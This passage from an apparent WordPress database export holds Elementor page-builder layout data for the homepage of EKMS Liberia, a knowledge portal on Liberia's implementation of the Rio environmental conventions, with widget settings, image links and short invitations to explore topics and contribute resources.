fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(19368,2830,'_elementor_version','2.7.5'),(19369,2830,'_elementor_template_type','wp-page'),(19370,2830,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(19375,2831,'_wp_page_template','default'),(19376,2831,'_elementor_edit_mode','builder'),(19377,2831,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"slideshow\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"rgba(255,255,255,0.78)\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5500000000000000444089209850062616169452667236328125},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":2035,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_epa.jpg\"},{\"id\":2036,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home1.jpg\"},{\"id\":2037,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home2.jpg\"},{\"id\":2038,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home3.jpg\"},{\"id\":2039,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_maps.jpg\"}],\"background_slideshow_ken_burns_zoom_direction\":\"out\",\"background_slideshow_slide_transition\":\"slide_left\"},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.04)\",\"padding\":{\"unit\":\"px\",\"top\":\"130\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":65},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25},\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"900\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EKMS provides free and open access to information from key government and partner institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_font_family\":\"Roboto\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\",\"search_source\":[\"document\",\"institution\",\"mea_resource\",\"project_resource\",\"related_topic\"]},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore the EKMS Documents Database.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-database\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Latest News & Blogs\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"339607e\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"684051a\",\"elType\":\"widget\",\"settings\":{\"number\":4,\"columns\":\"4\",\"equal_height_cols\":\"true\",\"title_trimmed\":\"yes\",\"title_length\":10,\"title_trimmed_ending_text\":\"...\",\"excerpt_length\":10,\"show_terms\":\"yes\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"537281f\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"821cf97\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_bg\":\"rgba(0,100,0,0.59)\",\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"title_typography_font_weight\":\"900\",\"excerpt_color\":\"rgba(255,255,255,0.61)\",\"excerpt_typography_typography\":\"custom\",\"excerpt_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"terms_link_bg_color\":\"#6ec1e4\"},\"elements\":[],\"widgetType\":\"jet-posts\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read All News & Blogs\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/news-and-blogs\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2c527f4\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6472317\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"39c4f0e\",\"elType\":\"column\",\"sett